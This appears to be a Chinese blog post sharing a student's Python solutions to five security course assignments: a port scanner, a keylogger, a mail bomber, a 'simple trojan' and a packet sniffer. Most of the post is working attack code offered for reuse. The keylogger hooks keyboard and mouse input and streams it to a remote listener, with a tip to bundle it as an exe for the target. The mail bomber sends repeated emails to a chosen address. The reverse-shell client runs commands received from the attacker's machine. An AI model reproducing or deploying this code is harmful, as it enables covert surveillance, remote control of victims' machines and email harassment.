记专业课程设计

记专业课程设计

五个题目都挺简单 题目一稍微麻烦点 涉及到线程 因为要考虑到合理分配线程资源的问题 以及扫描过程中的连接超时时间的设定不能太大或太小

切记不要直接拿源码提交实验报告 至少自己要有改动 至少加入点自己的思考

题目一:端口扫描

具体要求:对指定的网段和端口进行扫描。
A、 可指定IP地址或是网段,可指定端口范围;
B、 可设定扫描所需的线程数;
C、 对扫描结果进行良好的显示。

#port-scan.py
#by Xiaohuihui
import socket, threading ,time ,optparse

thread_num = 200
timeout = 5


alive_port = set()
close_port = set()
lock = threading.Lock()
key = 0

def scan_thread(start, end ,ipORdomain):

    for i in range(start, end):
        if i != 110 and i !=25 :
            try:
                sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                sk.settimeout(timeout)
                sk.connect((ipORdomain,i))
                alive_port.add(i)
            except Exception:
                close_port.add(i)
            sk.close()
            global key
            with lock:
                key+=1
        else:
            continue


def main():
    ip_list=[]
    port_list=[]
    thread_num = 200
    usage="usage  -o <target host> -p <target ports> -t <scan thread>"
    parser=optparse.OptionParser(usage)  #创建对象实例
    parser.add_option('-o',dest='Host',type='string',help='target host')   ##需要的命令行参数
    parser.add_option('-p',dest='Ports',type='string',help='target ports')
    parser.add_option('-t',dest='thread',type='string',help='scan thread')
    (options,args)=parser.parse_args()
    Host=options.Host
    Ports=options.Ports
    thread_num=options.thread
    if thread_num == None:
        thread_num = 2

    if (Host==None)|(Ports==None):         ##如果主机和端口都是空的话
        print(parser.usage)
        exit(0)


    if '-' in Host:
        ipcl = Host.find('-')
        ip_start = Host[0:int(ipcl)]
        ip_end = Host[int(ipcl)+1:]
        flag = int(ip_start.rfind('.'))
        ipfor_begin = ip_start[flag+1:]
        ipfor_end = ip_end[flag+1:]
        Host = ip_start[0:flag+1]
        ip_list=[]
        for i in range(int(ip_start[flag+1:]),int(ip_end[flag+1:])+1):
            ip_list.append(ip_start[0:flag+1]+str(i))
    else:
        Host = options.Host
        ip_list.append(Host)
    if '-' in Ports:
        portcl = Ports.find('-')
        port_start = int(Ports[0:int(portcl)])
        port_end = int(Ports[int(portcl)+1:])
        Ports = port_start
        for i in range(port_start,port_end+1):
            port_list.append(i)
    else:
        Ports=options.Ports
        port_list.append(Ports)

    ipORdomain_list = ip_list
    port_num = port_list

    for ipORdomain in ipORdomain_list:
        start_time = time.time()
        thread_list = []
        for i in range(int(thread_num)):
            start =int(port_num[0]) + i*round(len(port_num)/int(thread_num))
            end = int(port_num[0]) + (i+1)*(round(len(port_num)/int(thread_num)))
            t = threading.Thread(target=scan_thread, args=(start, end ,ipORdomain))
            thread_list.append(t)
        for t in thread_list:
            t.start()
        for t in thread_list:
            t.join()
        print('IP:'+ipORdomain+' alive ports are {}'.format(sorted(alive_port)))
        alive_port.clear()


if __name__ == '__main__':
    main()

运行效果如下

在这里插入图片描述

题目二:键盘记录

具体要求:对被监控系统的键盘操作可进行实时的监控,将监视结果发回远程主机进行查看。
A、 对被监控主机的键盘及鼠标操作进行监控和记录;
B、 可通过网络接口将监控的结果发回到远程主机;
C、 将收到的结果进行有效的实时显示。

题目二需要安装额外的库
这里已将python3.7环境所需要的库文件分享到如下
需要自取 安装问题自行百度
(链接:https://share.weiyun.com/H1JVsrNa 密码:stx93q)

还一点需要注意的是 如果在非本机的其他环境进行监控测试的话,可以用pyinstall将py文件打包成一个exe文件,这样被控机就不需要安装Hook等其他繁琐的库环境了

#client.py
#by Xiaohuihui
import socket
import pythoncom 
import PyHook3
import time


client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = "127.0.0.1"
port = 1216
client.connect((host, port))


def onMouseEvent(event): 
    # 监听鼠标事件     
    client.send(("\nMessageName:"+event.MessageName).encode())
    client.send(("\nTime:"+time.strftime("%Y %H:%M:%S", time.localtime())).encode())
    client.send(("\nPosition:"+str(event.Position)).encode())
    client.send("\n-----".encode())
    return True
  
def onKeyboardEvent(event):
    # 监听键盘事件     

    client.send(("\nMessageName:"+event.MessageName).encode())
    client.send(("\nTime:"+time.strftime("%Y %H:%M:%S", time.localtime())).encode())
    client.send(("\nAscii:"+str(int(event.Ascii))+' '+str(chr(event.Ascii))).encode())
    client.send(("\nKey:"+event.Key).encode())
    client.send("\n-----".encode())
    return True 
 
def main():     
    # 创建一个“钩子”管理对象     
    hm = PyHook3.HookManager()      
    # 监听所有键盘事件     
    hm.KeyDown = onKeyboardEvent     
    # 设置键盘“钩子”     
    hm.HookKeyboard()      
    # 监听所有鼠标事件     
    hm.MouseAll = onMouseEvent     
    # 设置鼠标“钩子”     
    hm.HookMouse()      
    # 进入循环,如不手动关闭,程序将一直处于监听状态     
    pythoncom.PumpMessages() 
    client.close()
 
if __name__ == "__main__":     
    main()

#sever.py
#by Xiaohuihui
import socket

socketserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = '127.0.0.1'
port = 1216

socketserver.bind((host, port))

socketserver.listen(5)
print("等待客户端连接……")
clientsocket,addr = socketserver.accept()
print("已建立初步连接, 开始数据传输……")

while True:

    recvmsg = clientsocket.recv(1024)
    strData = recvmsg.decode("utf-8")
    print("收到:"+strData)

运行效果如下

在这里插入图片描述

题目三:发送垃圾邮件

具体要求:编写程序发送垃圾邮件到被攻击的邮箱。
A、 编写程序批量发送邮件到被攻击的邮箱,可设定被攻击的邮箱地址;
B、 可设定发送的邮件数量;
C、 可设置发送邮件的时间间隔。

#sendmail.py
#by Xiaohuihui
import smtplib
import time
from email.mime.text import MIMEText

smtpserver = "smtp.qq.com"
smtpport = 465
from_mail = "[email protected]"   #这里改为你自己的邮箱
password = "xxxxxxxxxxxxxxxx"   # 这里改为你自己的邮箱16位授权码
content="test"
msg = MIMEText(content)
to_mail=input("请输入目标邮箱:\n格式为([email protected])\n")
cs = int(input("请输入发送次数:\n"))
sleeptime = int(input("请输入时间间隔:\n(时间单位秒)\n"))

for i in range(1,cs+1):
	time.sleep(sleeptime)
	try:
		smtp = smtplib.SMTP_SSL(smtpserver,smtpport)
		smtp.login(from_mail,password)
		smtp.sendmail(from_mail,to_mail,msg.as_string())
	except(smtplib.SMTPException) as e:
		print(e.message)
	finally:
		smtp.quit()

print("已成功向指定邮箱发送所有邮件!")

运行效果如下

在这里插入图片描述

题目四:简易木马

具体要求:编写程序对远程主机进行操控。
A、 被攻击的主机反向连接攻击机;
B、 可在被攻击的主机上执行命令(以命令行的形式,如dir、ls、rm、del等);
C、 将操作的结果显示到攻击机上。

#client.py
#by Xiaohuihui
import socket
import os
import sys
import time


baili="127.0.0.1"
port=1216
server=(baili,port)
s=socket.socket()
s.connect(server)

while 1:
    dir=os.getcwd()
    s.send(dir.encode())
    cmd=s.recv(1024).decode()
    if cmd=="exit":
        break
    elif cmd.startswith("cd"):
        os.chdir(cmd[2:].strip())
        result="切换目录成功!"
    else:
        result=os.popen(cmd).read()
    if not result:
        result="命令执行完毕!"
    
    s.send(result.encode())
    time.sleep(1)
    
s.close()
print("退出!")
#sever.py
#by Xiaohuihui
import socket
import time


server=("0.0.0.0",1216)
s=socket.socket()
s.bind(server)
s.listen(5)
con,addr=s.accept()
print(addr,"shell已反弹回来!")
while 1:
    dir=con.recv(1024).decode()
    cmd=input(dir+":").strip()
    con.send(cmd.encode())
    if cmd=="exit":
        break
    result=con.recv(65365)
    print(result.decode())
    time.sleep(1)
s.close()
print("退出!")

运行效果如下

在这里插入图片描述

题目五:网络数据嗅探

具体要求:编写程序对数据包进行捕获。
A、 对IP层的数据进行相应的捕获;
B、 可设定要监听的接口、或可以从默认接口监听;
C、 对数据的实时显示包括源地址、目的地址、源端口、目的端口、数据包长度、抓取的时间。

#sniffe-IP.py
#by Xiaohuihui
from scapy.all import *
sniff(iface='WLAN',count=0,prn=lambda x : x.sprintf("{IP:%IP.src%:%IP.sport%-> %IP.dst%:%IP.dport%} IP报文长度%IP.len% 抓取时间 %IP.time%"))

运行效果如下

在这里插入图片描述

猜你喜欢

转载自blog.csdn.net/qq_21538159/article/details/108922906